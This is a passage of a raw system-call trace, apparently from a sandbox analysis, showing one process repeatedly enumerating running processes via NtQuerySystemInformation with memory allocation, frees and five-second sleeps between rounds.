BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.612] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.619] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.626] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.634] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.641] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.649] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.658] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.706] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.715] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.722] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.731] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.738] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.749] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.767] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.776] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 